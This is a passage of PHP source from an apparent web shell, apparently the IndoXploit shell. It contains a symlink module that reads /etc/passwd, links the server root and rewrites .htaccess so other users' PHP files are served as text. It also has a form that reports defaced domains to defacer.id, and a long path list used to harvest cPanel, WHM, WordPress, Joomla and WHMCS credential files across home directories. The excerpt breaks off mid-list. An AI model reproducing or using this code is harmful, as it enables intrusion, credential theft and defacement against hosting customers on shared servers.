  2383. <td><a href='$full/Sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2384. flush();
  2385. $dcount++;}}}
  2386. echo "</table>";
  2387. }else{
  2388. $TEST=@file('/etc/passwd');
  2389. if ($TEST){
  2390. @mkdir("Sym",0777);
  2391. @chdir("Sym");
  2392. exe("ln -s / root");
  2393. $file3 = 'Options Indexes FollowSymLinks
  2394. DirectoryIndex jancox.htm
  2395. AddType text/plain .php
  2396. AddHandler text/plain .php
  2397. Satisfy Any';
  2398. $fp3 = fopen('.htaccess','w');
  2399. $fw3 = fwrite($fp3,$file3);
  2400. @fclose($fp3);
  2401. echo "
  2402. <table align=center border=1><tr>
  2403. <td align=center><font size=3>S. No.</font></td>
  2404. <td align=center><font size=3>Users</font></td>
  2405. <td align=center><font size=3>Symlink</font></td></tr>";
  2406. $dcount = 1;
  2407. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  2408. while(!feof($file)){
  2409. $s = fgets($file);
  2410. $matches = array();
  2411. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  2412. $matches = str_replace("home/","",$matches[1]);
  2413. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2414. continue;
  2415. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2416. <td align=center><font class=txt>" . $matches . "</td>";
  2417. echo "<td align=center><font class=txt><a href=$full/Sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2418. $dcount++;}fclose($file);
  2419. echo "</table>";}else{if($os != "Windows"){@mkdir("Sym",0777);@chdir("Sym");@exe("ln -s / root");$file3 = '
  2420. Options Indexes FollowSymLinks
  2421. DirectoryIndex jancox.htm
  2422. AddType text/plain .php
  2423. AddHandler text/plain .php
  2424. Satisfy Any
  2425. ';
  2426. $fp3 = fopen('.htaccess','w');
  2427. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2428. echo "
  2429. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  2430. <table align=center border=1><tr>
  2431. <td align=center><font size=3>ID</font></td>
  2432. <td align=center><font size=3>Users</font></td>
  2433. <td align=center><font size=3>Symlink</font></td></tr>";
  2434. $temp = "";$val1 = 0;$val2 = 1000;
  2435. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  2436. if ($uid)$temp .= join(':',$uid)."\n";}
  2437. echo '<br/>';$temp = trim($temp);$file5 =
  2438. fopen("test.txt","w");
  2439. fputs($file5,$temp);
  2440. fclose($file5);$dcount = 1;$file =
  2441. fopen("test.txt", "r") or exit("Unable to open file!");
  2442. while(!feof($file)){$s = fgets($file);$matches = array();
  2443. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  2444. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  2445. continue;
  2446. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  2447. <td align=center><font class=txt>" . $matches . "</td>";
  2448. echo "<td align=center><font class=txt><a href=$full/Sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  2449. $dcount++;}
  2450. fclose($file);
  2451. echo "</table></div></center>";unlink("test.txt");
  2452. } else
  2453. echo "<center><font size=3>Cannot create Symlink</font></center>";
  2454. }
  2455. }
  2456. }
  2457. elseif($_GET['do'] == 'defacerid') {
  2458. echo "<center><form method='post'>
  2459. <u>Defacer</u>: <br>
  2460. <input type='text' name='hekel' size='50' value='hscrew'><br>
  2461. <u>Team</u>: <br>
  2462. <input type='text' name='tim' size='50' value='IndoXploit'><br>
  2463. <u>Domains</u>: <br>
  2464. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  2465. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  2466. </form>";
  2467. $site = explode("\r\n", $_POST['sites']);
  2468. $go = $_POST['go'];
  2469. $hekel = $_POST['hekel'];
  2470. $tim = $_POST['tim'];
  2471. if($go) {
  2472. foreach($site as $sites) {
  2473. $zh = $sites;
  2474. $form_url = "https://www.defacer.id/notify";
  2475. $data_to_post = array();
  2476. $data_to_post['attacker'] = "$hekel";
  2477. $data_to_post['team'] = "$tim";
  2478. $data_to_post['poc'] = 'SQL Injection';
  2479. $data_to_post['url'] = "$zh";
  2480. $curl = curl_init();
  2481. curl_setopt($curl,CURLOPT_URL, $form_url);
  2482. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  2483. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  2484. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  2485. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2486. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  2487. $result = curl_exec($curl);
  2488. echo $result;
  2489. curl_close($curl);
  2490. echo "<br>";
  2491. }
  2492. }
  2493. }
  2494.  
  2495. elseif($_GET['do'] == 'config') {
  2496. if($_POST){
  2497. $passwd = $_POST['passwd'];
  2498. mkdir("cox_config", 0777);
  2499. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  2500. $htc = fopen("cox_config/.htaccess","w");
  2501. fwrite($htc, $isi_htc);
  2502. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  2503. foreach($user_config[1] as $user_cox) {
  2504. $user_config_dir = "/home/$user_cox/public_html/";
  2505. if(is_readable($user_config_dir)) {
  2506. $grab_config = array(
  2507. "/home/$user_cox/.my.cnf" => "cpanel",
  2508. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  2509. "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2510. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2511. "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2512. "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  2513. "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2514. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  2515. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2516. "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2517. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2518. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  2519. "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
  2520. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
  2521. "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2522. "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2523. "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2524. "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2525. "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2526. "/home/$user_cox/public_html/submitticket.php" => "WHMCS",
  2527. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  2528. "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2529. "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2530. "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2531. "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2532. "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2533. "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2534. "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2535. "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2536. "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2537. "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2538. "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2539. "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2540. "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2541. "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2542. "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2543. "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2544. "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2545. "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2546. "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2547. "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2548. "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2549. "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2550. "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2551. "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2552. "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2553. "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2554. "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2555. "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2556. "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2557. "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2558. "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2559. "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2560. "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2561. "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2562. "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2563. "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  2564. "/home/$user_cox/public_html/wp-config.php" => "WordPress",
  2565. "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2566. "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2567. "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2568. "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2569. "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2570. "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2571. "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2572. "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2573. "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2574. "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2575. "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2576. "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2577. "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2578. "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2579. "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2580. "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2581. "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2582. "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2583. "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2584. "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2585. "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2586. "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2587. "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2588. "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2589. "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2590. "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2591. "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2592. "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2593. "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2594. "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2595. "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2596. "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2597. "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2598. "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2599. "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2600. "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2601. "/home1/$user_cox/.my.cnf" => "cpanel",
  2602. "/home1/$user_cox/.accesshash" => "WHM-accesshash",
  2603. "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2604. "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2605. "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2606. "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  2607. "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2608. "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
  2609. "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2610. "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2611. "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2612. "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
  2613. "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
  2614. "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",
  2615. "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2616. "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2617. "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2618. "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2619. "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2620. "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",
  2621. "/home1/$user_cox/public_html/configuration.php" => "Joomla",
  2622. "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2623. "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2624. "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2625. "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2626. "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2627. "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2628. "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2629. "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2630. "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2631. "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2632. "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2633. "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2634. "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2635. "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2636. "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2637. "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2638. "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2639. "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2640. "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2641. "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2642. "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2643. "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2644. "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2645. "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2646. "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2647. "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2648. "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2649. "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2650. "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2651. "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2652. "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2653. "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2654. "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2655. "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2656. "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2657. "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  2658. "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
  2659. "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2660. "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2661. "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2662. "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2663. "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2664. "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2665. "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2666. "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2667. "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2668. "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2669. "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2670. "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2671. "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2672. "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2673. "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2674. "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2675. "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2676. "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2677. "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2678. "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2679. "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2680. "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2681. "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2682. "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2683. "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2684. "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2685. "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2686. "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2687. "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2688. "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2689. "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2690. "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2691. "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2692. "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2693. "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2694. "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2695. "/home2/$user_cox/.my.cnf" => "cpanel",
  2696. "/home2/$user_cox/.accesshash" => "WHM-accesshash",
  2697. "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2698. "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2699. "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2700. "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  2701. "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2702. "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
  2703. "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2704. "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2705. "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2706. "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
  2707. "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
  2708. "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",
  2709. "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2710. "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2711. "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2712. "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2713. "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2714. "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",
  2715. "/home2/$user_cox/public_html/configuration.php" => "Joomla",
  2716. "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2717. "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2718. "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2719. "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2720. "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2721. "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2722. "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2723. "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2724. "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2725. "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2726. "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2727. "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2728. "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2729. "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2730. "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2731. "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2732. "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2733. "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2734. "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2735. "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2736. "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2737. "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2738. "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2739. "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2740. "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2741. "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2742. "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2743. "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2744. "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2745. "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2746. "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2747. "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2748. "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2749. "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2750. "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2751. "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  2752. "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
  2753. "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2754. "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2755. "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2756. "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2757. "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2758. "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2759. "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2760. "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2761. "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2762. "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2763. "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2764. "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2765. "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2766. "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2767. "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2768. "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2769. "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2770. "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2771. "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2772. "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2773. "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2774. "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2775. "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2776. "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2777. "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2778. "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2779. "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2780. "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2781. "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2782. "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2783. "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2784. "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2785. "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2786. "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2787. "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2788. "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  2789. "/home3/$user_cox/.my.cnf" => "cpanel",
  2790. "/home3/$user_cox/.accesshash" => "WHM-accesshash",
  2791. "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  2792. "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  2793. "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  2794. "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  2795. "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  2796. "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
  2797. "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  2798. "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  2799. "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
  2800. "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
  2801. "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
  2802. "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",
  2803. "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  2804. "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  2805. "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
  2806. "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  2807. "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  2808. "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",
  2809. "/home3/$user_cox/public_html/configuration.php" => "Joomla",
  2810. "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
